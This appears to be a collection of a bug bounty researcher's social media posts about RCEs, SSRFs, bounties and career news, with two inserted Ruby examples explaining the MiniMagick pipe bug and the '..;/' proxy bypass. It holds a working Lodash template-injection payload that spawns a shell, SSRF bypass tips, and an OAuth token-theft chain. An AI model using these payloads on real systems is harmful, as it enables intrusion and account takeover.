Just got $50k (2*25k) for our RCE. Waiting for approval to publish our writeup. cc @iamnoooob
Sat down with @iamnoooob and worked on the recent MobileIron MDM RCE by @orange_8361, and what a great find. Here's an RCE PoC using JNDI injection via a local classloading reference, triggered using Hessian deserialization as stated in the blog. github.com/iamnoooob/CVE-Rev…
I bought something with bounty 😍
Exploited Lodash SSTI with @iamnoooob via process binding spawn_sync. Here's a tweetable RCE PoC ${x=Object}${w=a=new x}${w.type="pipe"}${w.readable=1}${w.writable=1}${a.file="/bin/sh"}${a.args=["/bin/sh","-c","id"]}${a.stdio=[w,w]}${process.binding("spawn_sync").spawn(a).output}
Here’s our Apple RCE writeup!
@rootxharsh and I found and exploited a 0-day RCE in Apple's Travel Portal and were rewarded with $50K. Here's the write-up for that: github.com/httpvoid/writeups…
After more than two years of hacking on @Vimeo, I'm excited to share that I'm joining them as an Application Security Engineer 🤘. It's time to go to the other side!
FYI - this is what the triagers go through on a daily basis, in mass amounts. Oof.
We've been assigned CVE-2021-41349 for a pre-auth reflected XSS in MS Exchange. Found this with @iamnoooob months back while playing with ProxyShell lol. github.com/httpvoid/CVE-Reve… msrc.microsoft.com/update-gu…
There's a lot of blind following in infosec. Sometimes, fame is valued more than skills.
$30k goal by @bhavukjain1 is completed. @tweetrpersonal9 and I just got $30k from @PayPalInfoSec at @Hacker0x01
Sat down with @iamnoooob and did this ExifTool (CVE-2021-22204) RCE. Nice one @wcbowling! Now let's try to fit this in a JPEG.
Inspired by all the awesome creators, here's our try at video content. Here's the first installment of the JavaScript Prototype Pollution series. piped.video/watch?v=J3MIOIqv… by @iamnoooob & me.
JavaScript Prototype Pollution Part 2 is up! And I personally think @iamnoooob has done a great job in this video. We walk through the theoretical concept, a vulnerable application, and then the application in debug mode 😉 Subs/likes/RTs are appreciated piped.video/yDmOXhr8wmw
Workshop "Demystifying the Server Side" slides, presented at Ekoparty, Hacktivity Conf, and NoNameCon 2020 by @h4ckologic, @iamnoooob and me. docs.google.com/presentation…
Thank you @Hacker0x01 @Bugcrowd @SynackRedTeam and all the platforms/programs I participated in. This would never have been possible without them. The balcony is a mess ATM but would be a cool place to hack at soon. All the hard work paid off! :)
Our vulnerability research team at @pdiscoveryio is on a streak. Reported three RCEs to Apple, one each month, netting $75,000 in bounties. Can we pop again in April? Let's go!
What a great fucking chain. It's the best SSRF we've done @S1r1u5_ @iamnoooob. Incredible work @S1r1u5_. Lots of learning! Probably a write-up soon.
Finallllyyyy!! From API docs, to not having API access, to blind SSRF, to tricky MIME type sniffing, to secrets/responded SSRF ;)
Joined the team at @pdiscoveryio as a vulnerability researcher alongside @iamnoooob. Excited to work on some challenging stuff ahead!
Who messed up the DNS entries again?
Getting started in hacking? Check out github.com/chybeta by @chybeta. Awesome resources, all categorised. (Translate to English)
Hi fellow bug hunters!! The most valuable $400 I spend every year. @Burp_Suite #bugbounty
Wrote a @pdnuclei template with a slight variation of the public version & made 10k in a day. You can criticize people for not using it in the right manner, but the tool in itself, when used efficiently & reliably, can ez make $$. No one filed dupes to our reports.
My first CVE 😀 RCE in the MiniMagick gem: class Image, method open. The input, i.e. the image path or URL to be opened, is passed to Kernel.open, which allows a piped subprocess; hence, in a scenario where a user controls this value and no sanitisation is done, this could lead to RCE.
CVE-2019-13574 In lib/mini_magick/image.rb in MiniMagick before 4.9.4, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernel#open, which accepts ... vulmon.com/vulnerabilitydeta…
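The mechanism behind that CVE, as an added Ruby example that is not MiniMagick's own code: Kernel#open treats a string beginning with "|" as a shell command and hands back a pipe to it, while File.open only ever opens a file. The `|echo pwned` payload and the temp file are constructed stand-ins for an attacker-controlled image path and a legitimate image.

```ruby
require "tempfile"

# Added example, not MiniMagick's code: the shape of the CVE-2019-13574 bug.
# Kernel#open interprets a leading "|" as "run this command and give me
# its stdout", so an attacker-controlled path becomes command execution.
def vulnerable_open(user_path)
  io = open(user_path)          # "|id" => spawns `id` through the shell
  data = io.read
  io.close
  data
end

# Hardened form: File.open never interprets a pipe prefix; "|echo pwned"
# is just a filename that does not exist, so it raises Errno::ENOENT.
def safe_open(user_path)
  File.open(user_path, "rb") { |f| f.read }
end

# Run both against a constructed pipe payload and a constructed real file.
# Returns [output of the vulnerable call, result of the safe call,
#          content both calls return for a genuine file].
def demo_open
  payload = "|echo pwned"
  vuln = vulnerable_open(payload)
  safe = begin
    safe_open(payload)
  rescue Errno::ENOENT
    :rejected
  end
  tf = Tempfile.new("img")
  tf.write("GIF89a")          # constructed stand-in for a real image
  tf.flush
  real = safe_open(tf.path)
  tf.close!
  [vuln, safe, real]
end

if __FILE__ == $PROGRAM_NAME
  p demo_open   # ["pwned\n", :rejected, "GIF89a"]
end
```

The fix MiniMagick shipped is the same idea: stop routing user-supplied paths through Kernel#open. Anywhere a path or URL comes from the user, reach for File.open (or an HTTP client for URLs) and never for the bare open.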
CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC. @pdnuclei Template - github.com/projectdiscovery/… cc @iamnoooob @wvuuuuuuuuuuuuu !
Today was my last day at @pdiscoveryio. This place gave me the opportunity to do what I love: vuln research. I'm genuinely thankful for that. It's been fun hacking with @iamnoooob, and I'm sure he'll keep publishing great blogposts that I'll now be reading from the other side. What's next? I'm taking a leap and going full-time on @HacktronAI, building an autonomous AI security researcher. Hacktron has already found 0days, reversed CVEs, and uncovered some cool bugs. It's going to be a fun and challenging journey, but I'm all in and really excited to build this with @S1r1u5_ and @zeyu2001 .
Proud to announce I'm joining @ZomatoIN as Security Engineer. Will be moving to Gurgaon/Gurugram soon. Would be awesome to work with you @prateek_0490 .
I discuss a tricky SSRF finding in this post which led to SSRF on Dropbox BBP amongst others. If you enjoy this and other articles in the repo, please consider retweeting and following @httpvoid0x2f for more content.
Hacking Google Drive integrations with a case study involving the use of CRLF and Request Pipelining to perform SSRF. github.com/httpvoid/writeups…
Thread - We get asked about our methodology very often. So I'm gonna try to parse mine in a thread. I don't think there's one, but let's try. My mindset, apart from making money, is enjoying the hunt & impressing the person on the other side. I've made many connections this way.
#bugbounty goal 2018 - $30,000 across both @Hacker0x01 @Bugcrowd - 5k rep at @Hacker0x01 - Start giving more time to @Bugcrowd - Clear OSCP - At least 2 valid bugs to each of Google, Facebook, Yahoo. Let's hope for the best 😍
And that's the first RCE of 2019 :) Gotta love those blitz. @SynackRedTeam
> Blind ssrf with gopher support. > internal host working on an open source project. > RCE via a header in the open source project. > Time to exploit > Host is not reachable on plain HTTP > Gopher becomes useless > Cries in TLS handshake Pain
Weekend with a $20,000 bounty for a single bug (my highest), thanks @PayPalInfoSec
5 triagers can't understand one XSS report. 🤦‍♂️
Felt like shitposting @iamnoooob
Nice little bug in Rails (CVE-2021-22885) github.com/rails/rails/blob/… redirect_to(params[:lol]) /?lol[]=xxxxxx undefined method `xxxxxx_url`
#Mobikwik data breach. I confirmed the data via the onion portal; this is legit. I've also learned from a few friends that their data has a card in it while their account on Mobikwik doesn't have any card saved to it. WTH? Nice take there. FYI - @TheHackersNews
I'll be disclosing a bug with a few case studies soon. I was initially thinking to just post a write-up as the bug itself is not hard, but it is something that opens up the type of bugs you should be thinking about. Not sure if I should go for a video with demos or a blog post.
10K club @Hacker0x01 .. Send some goodies? @0xrudrapratap
"The more you have, the more I will take." - Chrome
PII leak 10k but RCE 3k :( This was a nice ssrf with RCE potential. Yay, I was awarded a $3,000 bounty on @Hacker0x01! hackerone.com/bugdiscloseguy… #TogetherWeHitHarder
Some changes to @Vimeo 's Bug Bounty program: - Full bounty on triage - Your report does not necessarily need to include a full exploit for chained bugs, we might consider them for payout. - No more CVSS! 20% bonus on reports for a limited time More - hackerone.com/vimeo
Some personal news - This is my last week at Vimeo. I've enjoyed my time here. Onwards to new stuff & challenges!
A good week on @Hacker0x01 :)
One more: find a subdomain such as <grafana>.corp.company.com which points to an external IP, for example, but is only accessible inside the VPN; such an SSRF could be leveraged that way. You can often find such hosts over SSL. Have exploited such in the past. Might even be a #bugbountytip
Thoughts: - try specifying the port to see if 80 still responds to SSL traffic - see if you can find validation issues, e.g. https://x<new line>http://localhost - leverage a redirect to downgrade - try redirecting to file://, |ls, or gopher:// - inject headers for cache poisoning
Another year wasted successfully. Nothing done, nothing achieved.🙂🥲
New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file + Nginx's internal directive can expose database backups! projectdiscovery.io/blog/dis… This issue isn't limited to Discourse. It can affect other Rails + Nginx apps with similar configurations. Read our full analysis and detect it with our Nuclei template, now live on ProjectDiscovery Cloud!
Nah.. I know it's a joke but your audience has a lot of teenagers/newbies and they might actually think it's okay to skip sleep to hack. Which is not okay at all.
First submissions of 2020! ehh looks dupe to me.
Fun & simple to exploit #CVE-2020-1947 Apache ShardingSphere RCE. Another night, Another hack with @iamnoooob!
Completed skydiving ✅ With my Indian hacker buddies! Living that bounty life 😍 @princechaddha @AnsariOsama10 @securityidiots @ahm3dsec @armaancrockroax
So inspired by @stokfredrik @NahamSec @zseano's live streams lately. Thinking of doing one myself on Sunday (tomorrow), not sure what the topic will be, can be Q&A-like. Should I? Any topic suggestions? #BugBounty
New day, New 0day. cc @iamnoooob 🥳
#Thread #Year_2019 I didn't set any goals for 2019 and let myself reign free. I enjoyed it (a lot!) here are a few things I got in 2019. - A full-time job. - Learned, Earned, Traveled. - Moved to my new house & got a new car. Thanks, @Hacker0x01!
I’m gonna fall asleep any moment so, Happy new year everyone! Let’s pwn 2022 together!
Reproduced Citrix ADC Remote Code Execution #CVE201919781 with @iamnoooob. Good chaining. Learned new stuff exploiting this together!
Working on a video to disclose one of my somewhat cool SSRFs from 2019 and a recent Slack bug (disclosure requested). Both revolve around the same vector. I've procrastinated on this for so long lol.
This month so far: 3 - RCE, 2 - SSRF (1 with potential for RCE), 1 - LFI (private/public SSH key readable but SSH was working internally; could allow RCE if there was some uploader), 1 - RXSS :(
> Woke up at 4am > Starts thinking of theory to chain a few lows for a crit. > Theory works > Tweet this before actually writing down the report (SSRF to priv. esc.) > Call it a night?
Paid $350 to reach an endpoint with XSS only to get blocked by CSP 📉
Second RCE of 2019 xD Triaged and rewarded within 3 hrs on Saturday. Yay, I was awarded a $2,000 bounty on @Hacker0x01! hackerone.com/bugdiscloseguy… #TogetherWeHitHarder
Visa approved, Flights booked! Definitely up to catch up and discuss some content injections 😁 See ya all in Vegas. #h1702
There are a few RCE/SSRF case studies. If you ever wondered why ..;/ works, check out the reverse proxy section.
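Why `..;/` works, as an added Ruby model that is not taken from the workshop slides: a reverse proxy that enforces a path prefix sees `..;` as an ordinary directory name and lets `/app/..;/manager/html` through, while a Tomcat-style backend strips the `;param` path parameter from every segment first, is left with `..`, and only then collapses dot-segments, so it serves `/manager/html`. The `/app/` prefix, the `/manager/html` target and the two normalizers are simplified assumptions; percent-decoding, double slashes and other real-world rules are left out.

```ruby
# Added example: a parser differential between a prefix-checking reverse proxy
# and a servlet container that treats ";..." as a per-segment path parameter.
# This is a model of the behaviour, not code from either product.

# RFC 3986-style dot-segment removal shared by both views.
def collapse_dot_segments(segments)
  out = []
  segments.each do |seg|
    next if seg.empty? || seg == "."
    if seg == ".."
      out.pop
    else
      out << seg
    end
  end
  "/" + out.join("/")
end

# Proxy view: every segment is taken literally, so "..;" is a directory name.
def proxy_normalize(path)
  collapse_dot_segments(path.split("/"))
end

# Servlet-container view: drop ";param" from each segment, then normalize.
def tomcat_normalize(path)
  collapse_dot_segments(path.split("/").map { |seg| seg.split(";", 2).first.to_s })
end

ALLOWED_PREFIX = "/app/"   # assumed: the only prefix the proxy exposes

# Access-control decision the proxy makes on its own normalized path.
def proxy_allows?(path)
  proxy_normalize(path).start_with?(ALLOWED_PREFIX)
end

# Path the backend actually routes for a request the proxy let through.
def backend_path(path)
  tomcat_normalize(path)
end

def demo_path(path)
  { proxy_allows: proxy_allows?(path), backend_serves: backend_path(path) }
end

if __FILE__ == $PROGRAM_NAME
  p demo_path("/app/../manager/html")   # proxy blocks: normalizes to /manager/html
  p demo_path("/app/..;/manager/html")  # proxy allows, backend serves /manager/html
end
```

The defence is to make both hops agree: either reject `;` in path segments at the proxy, or let the backend (which knows its own parsing rules) enforce the prefix instead of trusting the proxy's view of the path.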
Don't take bug bounty as a race or some kind of game. Be calm and patient during your testing hours. Take proper rest when you hit your monthly money/bug-count target or you may suffer from mental issues (experienced).
Need to do a writeup of a trending Indian app (and mislead masses) or I will lose my fame.. don't care if it even makes sense.. just have to do it. ⌨️⌨️⌨️⌨️ lmao xD
This week's SAML blogs are a must-read - mutations, parser differentials and namespace confusions. Great stuff by @ahacker1_h1 @d4d89704243 @garethheyes @ulldma portswigger.net/research/sam… github.blog/security/sign-in… workos.com/blog/samlstorm
Hmm so, @cobalt_io thinks I'm not capable of being on their core team. I'd not blame them, I lack the core skillzz :(.
Reported an RCE to a program 10 days back, my webshell is still accessible 🙃
Very excited about this! @iamnoooob @h4ckologic will be giving a workshop about all those cool server-side stuff. :D With some cool case studies 😉 cfp.nonamecon.org/nnc2020/ta…
While reversing these CVEs & reading blogs from Orange, Matthias, Alvaro, Michael (artsploit) and many others in the process, I've learned so much, but still I have difficulties understanding lots of technicalities. Can only hope to become better over time.
Will stream on @Twitch tomorrow 8PM IST. We will be discussing SSRF/RCE. I am not sure if I'm ready for this but let's do it.
Starting bug bounties after a months-long break is so tough. REEEEEEEEEEEE
Billion $ corps vs teenagers.
4 years on HackerOne completed this Jan and ~6 Years in Infosec overall. Good journey.
Always wanted to utilise request pipelining in some SSRF chain. Finally did a neat one last night. @iamnoooob and I were staring at the request wondering why it wouldn't work, and then it worked.
We did great guys! @v0sx9b @tabahi_90 @ralamosm @JR0ch17 ... Congrats to @v0sx9b for a 25k bounty 🤘
@iamnoooob and I reproduced this latest MOVEit CVE (CVE-2023-36934). This is a pretty neat finding, props to the original finder.
📚 Learn about the MOVEit Transfer SQL Injection vulnerability (CVE-2023-36934) in our latest blog. Plus, we've also released @pdnuclei template to detect and aid quick mitigation. blog.projectdiscovery.io/mov… #MOVEit #Cybersecurity #hackwithautomation
Unpopular opinion: before asking about a basic concept, I think we all agree that one should try to Google it well before asking, else infosec isn't for you, right? This same concept should apply to platform analysts/triagers as well, else that role or infosec as a whole isn't for you?
#h1702 Thread: What an amazing event, opened my eyes to the whole new things the hackers do. Disappointed that I didn't find a single bug; got close to some but couldn't complete the chain. But that's what hacking is: you try, you fail, and you keep doing that until you pop it.
Here's a new writeup! I go over attempts at trying to find a 0day. It took a few attempts but pwned Apple again and netted total bounties of $40k.
Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k! blog.projectdiscovery.io/hel…
Did some casual BB after a long time with @iamnoooob! An XSS which looked so simple at first took 1.5 hrs to trigger. A confirmed path traversal, but not exploitable for now. An XXE on Java 1.8, so meh. Still digging down into a clearly visible RCE for the last 2-3 hrs 🙃🙃
Forgot to mention this in our post - @naglinagli @codecancare @streaak have been great to collab with and I would vouch for them. Here's a fun screenshot of when @iamnoooob and I first scanned our DB against it :). Tip - if you're scanning, do some basic operations instead of RCE.
@iamnoooob and @rootxharsh are super generous and played this one really well for companies, reversing the patch in ~week since disclosure, publishing first notice with PoC 3 days ago, reporting it to ~50 BBP programs and getting the full writeup out asap before ransom party.
10K 🙌🏼🙌🏼😅😅 Thank you everyone! 🙏🏻
After a year of hacking on Vimeo I finally found my first server-side critical on Vimeo yesterday. Like Brett said, stick around your fav target; it can take time to pop those crits.
Replying to @stokfredrik
1) Focus less on $ and more on learning. A lot of hackers have 15+ years already. You can ramp up fast, but there is a learning curve. 2) Pick a program you love and stick with it for a yr. I popped a 15k RCE on a site after a yr of effort. It can take time. 3) Persistence is key
#IndependenceDayIndia 🇮🇳 I would truly celebrate when we get independence from the religion- and caste-based backward mentality. Hope people start seeing each other as humans before anything else. Live long India.
Look who's having a walk on Golden Gate Bridge @Hacker0x01 😁
Replying to @HusseiN98D
Weird. I'd choose to be at the pub with my mates having some fine whiskey instead of dropping criticals, I could do that any other time. Life is short xD
Subdomain takeover -> Target has Facebook sign-in? -> Client app accepts *.target.com? -> Can control JS or have a way to read location.hash on the sub-domain? -> Extract the token -> Mobile app exchanges Facebook access token for target's API access token? -> WIN-WIN